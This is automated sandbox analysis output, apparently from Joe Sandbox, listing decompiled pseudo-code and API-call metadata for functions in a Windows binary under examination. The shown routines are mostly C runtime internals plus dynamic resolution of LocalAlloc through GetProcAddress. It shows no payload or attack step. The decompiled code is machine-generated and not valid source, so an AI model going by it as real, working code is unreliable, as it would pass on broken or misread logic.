                                                                                                                                                                                        				_v24 = _t50;
                                                                                                                                                                                        				if (_t50 == 0) goto 0xcef240f4;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170( *0xcef306c0,  &_v24,  &_v40, _t52 + 0x30) == 0) goto 0xcef240ea;
                                                                                                                                                                                        				if ( *0xcef306c0 + _v24 == 0) goto 0xcef240ea;
                                                                                                                                                                                        				E00007FF77FF7CEF23B74(_t39, _t52,  *0xcef306c0 + _v24, _t71, _t75, _t52 + 0x30);
                                                                                                                                                                                        				return LocalFree(??);
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLocalModuleProc
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 1697219777-3502785670
                                                                                                                                                                                        • Opcode ID: a4ba65414bfbc0efcb195b572de1388dbd8b7b6275e6f2a554c8fb93d7659486
                                                                                                                                                                                        • Instruction ID: 7b2ccadede1237154d3cc53dc6de3b47cba57c4797c3a5498b40712e005d4b0b
                                                                                                                                                                                        • Opcode Fuzzy Hash: a4ba65414bfbc0efcb195b572de1388dbd8b7b6275e6f2a554c8fb93d7659486
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D312672A19F0695FB80EF61E8403A873A4FB88768F900536CA0C27668DF7CE549C320
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF28639
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF28649
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF2910C: _errno.LIBCMT ref: 00007FF7CEF29115
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF2910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CEF29120
                                                                                                                                                                                        • EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286C7
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF275A4: realloc.LIBCMT ref: 00007FF7CEF275CF
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF275A4: Sleep.KERNEL32(?,?,00000000,00007FF7CEF286B7,?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A), ref: 00007FF7CEF275EB
                                                                                                                                                                                        • EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286D7
                                                                                                                                                                                        • EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286E4
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1909145217-0
                                                                                                                                                                                        • Opcode ID: 58590357ac74606fc0f2bc527207cdb1ba4607e8dd5afc26dccf76334392a10b
                                                                                                                                                                                        • Instruction ID: 3bf24848ec3de981f6a54effbd962130ab6851dcee87b318c1ea7131f9a9700a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 58590357ac74606fc0f2bc527207cdb1ba4607e8dd5afc26dccf76334392a10b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F216D21B0AB8A81EA81BF61F948069E391BF44BF0B844835DD0E2B755EF7CE584C760
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                        • Opcode ID: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                                                                                                                                                                        • Instruction ID: 6d9e5e9a9791045cbeee927c6a9ce686ec2187acd564ca4a11df7c306e2e7bec
                                                                                                                                                                                        • Opcode Fuzzy Hash: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                                                                                                                                                                        • Instruction Fuzzy Hash: EF01C421A18E0582FBD19F21F850265A360FB09BA0F952631DE5E577A4CF3DD884C720
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                                                                        			E00007FF77FF7CEF25200(long* __rax, long long __rbx, long long _a8) {
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                        				long _t9;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				long* _t23;
                                                                                                                                                                                        				long* _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t23 = __rax;
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				GetLastError();
                                                                                                                                                                                        				__imp__FlsGetValue();
                                                                                                                                                                                        				if (__rax != 0) goto 0xcef2526e;
                                                                                                                                                                                        				_t7 = E00007FF77FF7CEF27520(__rax, _t29, _t31, _t33, _t34, _t35);
                                                                                                                                                                                        				_t27 = _t23;
                                                                                                                                                                                        				if (_t23 == 0) goto 0xcef2526e;
                                                                                                                                                                                        				__imp__FlsSetValue();
                                                                                                                                                                                        				if (_t7 == 0) goto 0xcef25267;
                                                                                                                                                                                        				E00007FF77FF7CEF25148(_t27, _t27, _t23);
                                                                                                                                                                                        				_t9 = GetCurrentThreadId();
                                                                                                                                                                                        				_t27[2] = _t27[2] | 0xffffffff;
                                                                                                                                                                                        				 *_t27 = _t9;
                                                                                                                                                                                        				goto 0xcef2526e;
                                                                                                                                                                                        				_t10 = E00007FF77FF7CEF27460(_t23, _t27);
                                                                                                                                                                                        				SetLastError(??);
                                                                                                                                                                                        				return _t10;
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF2520A
                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25218
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25270
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF27520: Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565
                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25244
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00007FF7CEF25258
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2194181773-0
                                                                                                                                                                                        • Opcode ID: c2f942c3b6ac40cb3a111eec1c8f5182fc61f3bbf0bd2a821944a0c7fd960737
                                                                                                                                                                                        • Instruction ID: 505f3f847e9393601346d31d137604ea3c51d97f3cd5a3b3e4259fd0f8a85153
                                                                                                                                                                                        • Opcode Fuzzy Hash: c2f942c3b6ac40cb3a111eec1c8f5182fc61f3bbf0bd2a821944a0c7fd960737
                                                                                                                                                                                        • Instruction Fuzzy Hash: 28012120A09B4282FAD6BF75A445039A291AF48BB0F984634D91D123D5EF3CE4449A21
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                        			E00007FF77FF7CEF241D4(void* __eflags, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24) {
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                        				signed short _t28;
                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        				signed short _t33;
                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t56 = __rbx;
                                                                                                                                                                                        				_t53 = _t77;
                                                                                                                                                                                        				 *((long long*)(_t53 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t53 + 0x10)) = __rbp;
                                                                                                                                                                                        				 *((long long*)(_t53 + 0x18)) = __rsi;
                                                                                                                                                                                        				E00007FF77FF7CEF24130(_t53, _t53 - 0x28, __r8);
                                                                                                                                                                                        				if (__rcx != 0) goto 0xcef2422e;
                                                                                                                                                                                        				E00007FF77FF7CEF25798(__rcx, _t53);
                                                                                                                                                                                        				 *_t53 = 0x16;
                                                                                                                                                                                        				E00007FF77FF7CEF25730();
                                                                                                                                                                                        				if (_v16 == bpl) goto 0xcef24224;
                                                                                                                                                                                        				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
                                                                                                                                                                                        				goto 0xcef242c1;
                                                                                                                                                                                        				if (__rdx == 0) goto 0xcef24201;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_v40 + 0x14)) != 0) goto 0xcef24277;
                                                                                                                                                                                        				_t31 =  *(__rcx - __rdx + __rdx) & 0x0000ffff;
                                                                                                                                                                                        				if (_t31 - 0x41 < 0) goto 0xcef24254;
                                                                                                                                                                                        				if (_t31 - 0x5a > 0) goto 0xcef24254;
                                                                                                                                                                                        				_t32 = _t31 + 0x20;
                                                                                                                                                                                        				_t25 =  *__rdx & 0x0000ffff;
                                                                                                                                                                                        				if (_t25 - 0x41 < 0) goto 0xcef24267;
                                                                                                                                                                                        				if (_t25 - 0x5a > 0) goto 0xcef24267;
                                                                                                                                                                                        				if (_t32 == 0) goto 0xcef242a6;
                                                                                                                                                                                        				if (_t32 == _t25 + 0x20) goto 0xcef24240;
                                                                                                                                                                                        				goto 0xcef242a6;
                                                                                                                                                                                        				_t33 = E00007FF77FF7CEF25460( *(__rcx - __rdx) & 0x0000ffff, _v40, __rbx,  &_v40) & 0x0000ffff;
                                                                                                                                                                                        				_t28 = E00007FF77FF7CEF25460(__rdx[1] & 0x0000ffff, _v40, _t56,  &_v40);
                                                                                                                                                                                        				if (_t33 == 0) goto 0xcef242a6;
                                                                                                                                                                                        				if (_t33 == _t28) goto 0xcef24277;
                                                                                                                                                                                        				if (_v16 == bpl) goto 0xcef242c1;
                                                                                                                                                                                        				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
                                                                                                                                                                                        				return (_t33 & 0x0000ffff) - (_t28 & 0x0000ffff);
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                        • String ID: A$Z
                                                                                                                                                                                        • API String ID: 3686281101-4098844585
                                                                                                                                                                                        • Opcode ID: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                                                                                                                                                                        • Instruction ID: 7b8fac91f68cbb853b3718b473ceb30c1de0a1b0072b4b28b8b238d81e8b8932
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                                                                                                                                                                        • Instruction Fuzzy Hash: 222186A2E186D281EBA17F16A14017DF6A0EB90BB0FD84131EADD277D5CF6CD8418721
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                        			E00007FF77FF7CEF2224C(long long __rbx, void* __rcx, long long __rdx, long long __rsi, void* _a8, void* _a16) {
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                        				WCHAR* _v56;
                                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                                        				WCHAR* _t46;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        				long long _t54;
                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t55 = _t51;
                                                                                                                                                                                        				 *((long long*)(_t55 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t55 + 0x10)) = __rsi;
                                                                                                                                                                                        				 *((long long*)(_t55 - 0x30)) = _t55 - 0x28;
                                                                                                                                                                                        				_t36 =  *(__rcx + 8);
                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                        				 *(_t55 - 0x20) = _t46;
                                                                                                                                                                                        				 *(_t55 - 0x38) = _t46;
                                                                                                                                                                                        				 *((long long*)(_t55 - 0x10)) = __rdx;
                                                                                                                                                                                        				 *(_t55 - 0x18) = _t36;
                                                                                                                                                                                        				 *(__rcx + 8) = _t46;
                                                                                                                                                                                        				if (_t36 == 0) goto 0xcef222dc;
                                                                                                                                                                                        				if ( *(__rcx + 2) == 0) goto 0xcef222dc;
                                                                                                                                                                                        				GetModuleHandleW(_t46);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t36();
                                                                                                                                                                                        				_v56 = _t36;
                                                                                                                                                                                        				if (_t36 == 0) goto 0xcef222dc;
                                                                                                                                                                                        				r8d =  *(__rcx + 2) & 0x0000ffff;
                                                                                                                                                                                        				 *(__rcx + 8) = _t36;
                                                                                                                                                                                        				return E00007FF77FF7CEF21170(__rbx,  &_v56,  &_v24, _t54);
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$FilePointer
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 566066777-3502785670
                                                                                                                                                                                        • Opcode ID: b8c64fe991d167cb7dc6692ddd56d779f6955ba88ef4e3839f646d29b8748e60
                                                                                                                                                                                        • Instruction ID: 548396f81b1c77e988e94800fba0207d7f49cf2da5fb46be246f28b0bd6c08a5
                                                                                                                                                                                        • Opcode Fuzzy Hash: b8c64fe991d167cb7dc6692ddd56d779f6955ba88ef4e3839f646d29b8748e60
                                                                                                                                                                                        • Instruction Fuzzy Hash: 58118C32B09B4682EB50DF04F88406DB3F5FB88B94B558235DA9C43764EF3AE996C710
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                        			E00007FF77FF7CEF23A80(long long* __rax, long long __rbx, signed short* __rcx, long long _a8) {
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				if (__rcx == 0) goto 0xcef23ad7;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *__rax();
                                                                                                                                                                                        				if (__rax == 0) goto 0xcef23ad7;
                                                                                                                                                                                        				r8d =  *__rcx & 0x0000ffff;
                                                                                                                                                                                        				return E00007FF77FF7CEF27640(0x40, __rax, __rax, __rcx[4], _t30);
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 1646373207-3502785670
                                                                                                                                                                                        • Opcode ID: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                                                                                                                                                                        • Instruction ID: 239d83350b7611321ab17779d5e7fcce7056d2b1c07ff7d4f0537ab9dc97f3c3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AF05455B05A4781EE88EF96E451435A360EF48BA4F885035CB0D17754EF3DE498C720
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF7CEF2585D,?,?,00000028,00007FF7CEF28D1D,?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395), ref: 00007FF7CEF25823
                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,000000FF,00007FF7CEF2585D,?,?,00000028,00007FF7CEF28D1D,?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395), ref: 00007FF7CEF25838
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                        • API String ID: 1646373207-1276376045
                                                                                                                                                                                        • Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                                                                                                                                        • Instruction ID: f0ca846fabe142f505f240b8bb7104003164884a95d27e1a808932c83ea13fde
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FE01210F19B0242FE99BF60B8845745370AF88720BCD1038C81E55390EF6CA58EC724
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                        			E00007FF77FF7CEF2834C(void* __ecx, void* __eflags, long* __rax, long long __rbx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
                                                                                                                                                                                        				signed long long _v48;
                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				long* _t89;
                                                                                                                                                                                        				long long* _t95;
                                                                                                                                                                                        				long long _t96;
                                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                                        				long* _t110;
                                                                                                                                                                                        				signed long long _t115;
                                                                                                                                                                                        				long long* _t122;
                                                                                                                                                                                        				signed long long _t124;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t97 = __rbx;
                                                                                                                                                                                        				_t89 = __rax;
                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                        				_t41 = __ecx;
                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef2843d;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283df;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283cf;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283df;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283df;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283bf;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283ac;
                                                                                                                                                                                        				if (__eflags == 0) goto 0xcef283cf;
                                                                                                                                                                                        				E00007FF77FF7CEF25798(__eflags, __rax);
                                                                                                                                                                                        				 *((intOrPtr*)(__rax)) = 0x16;
                                                                                                                                                                                        				E00007FF77FF7CEF25730();
                                                                                                                                                                                        				goto 0xcef283ec;
                                                                                                                                                                                        				goto 0xcef2844b;
                                                                                                                                                                                        				goto 0xcef2844b;
                                                                                                                                                                                        				goto 0xcef2844b;
                                                                                                                                                                                        				E00007FF77FF7CEF25200(__rax, __rbx);
                                                                                                                                                                                        				_t110 = _t89;
                                                                                                                                                                                        				if (_t89 != 0) goto 0xcef283f4;
                                                                                                                                                                                        				goto 0xcef28566;
                                                                                                                                                                                        				_t108 =  *((intOrPtr*)(_t89 + 0xa0));
                                                                                                                                                                                        				_t102 = _t108;
                                                                                                                                                                                        				_t115 =  *0xcef2b32c;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t102 + 4)) == _t41) goto 0xcef2841d;
                                                                                                                                                                                        				_t103 = _t102 + 0x10;
                                                                                                                                                                                        				if (_t103 - (_t115 << 4) + _t108 < 0) goto 0xcef28405;
                                                                                                                                                                                        				_t95 = (_t115 << 4) + _t108;
                                                                                                                                                                                        				if (_t103 - _t95 >= 0) goto 0xcef28431;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t103 + 4)) == _t41) goto 0xcef28433;
                                                                                                                                                                                        				goto 0xcef2845d;
                                                                                                                                                                                        				_a8 = 1;
                                                                                                                                                                                        				__imp__DecodePointer();
                                                                                                                                                                                        				_t122 = _t95;
                                                                                                                                                                                        				if (_t122 != 1) goto 0xcef2846a;
                                                                                                                                                                                        				goto 0xcef28566;
                                                                                                                                                                                        				if (_t122 != 0) goto 0xcef28479;
                                                                                                                                                                                        				E00007FF77FF7CEF25B80(_t97, _t108, _t115);
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				if (1 == 0) goto 0xcef28485;
                                                                                                                                                                                        				E00007FF77FF7CEF2741C();
                                                                                                                                                                                        				if (_t41 == 8) goto 0xcef2849b;
                                                                                                                                                                                        				if (_t41 == 0xb) goto 0xcef2849b;
                                                                                                                                                                                        				if (_t41 == 4) goto 0xcef2849b;
                                                                                                                                                                                        				goto 0xcef284c7;
                                                                                                                                                                                        				_t124 =  *(_t110 + 0xa8);
                                                                                                                                                                                        				_v48 = _t124;
                                                                                                                                                                                        				 *(_t110 + 0xa8) =  *(_t110 + 0xa8) & 0x00000000;
                                                                                                                                                                                        				if (_t41 != 8) goto 0xcef284c7;
                                                                                                                                                                                        				r14d =  *((intOrPtr*)(_t110 + 0xb0));
                                                                                                                                                                                        				 *((intOrPtr*)(_t110 + 0xb0)) = 0x8c;
                                                                                                                                                                                        				goto 0xcef284cc;
                                                                                                                                                                                        				r14d = _a8;
                                                                                                                                                                                        				if (_t41 != 8) goto 0xcef2850a;
                                                                                                                                                                                        				_t46 =  *0xcef2b320; // 0x3
                                                                                                                                                                                        				_t61 = _t46;
                                                                                                                                                                                        				_v56 = _t46;
                                                                                                                                                                                        				_t38 =  *0xcef2b324; // 0x9
                                                                                                                                                                                        				if (_t61 - _t46 + _t38 >= 0) goto 0xcef28513;
                                                                                                                                                                                        				_t96 =  *((intOrPtr*)(_t110 + 0xa0));
                                                                                                                                                                                        				 *(_t96 + 8 + (_t61 + _t61) * 8) =  *(_t96 + 8 + (_t61 + _t61) * 8) & 0x00000000;
                                                                                                                                                                                        				_v56 = _t61 + 1;
                                                                                                                                                                                        				goto 0xcef284dd;
                                                                                                                                                                                        				E00007FF77FF7CEF25114();
                                                                                                                                                                                        				 *0xcef30038 = _t96;
                                                                                                                                                                                        				if (1 == 0) goto 0xcef2851e;
                                                                                                                                                                                        				E00007FF77FF7CEF2731C();
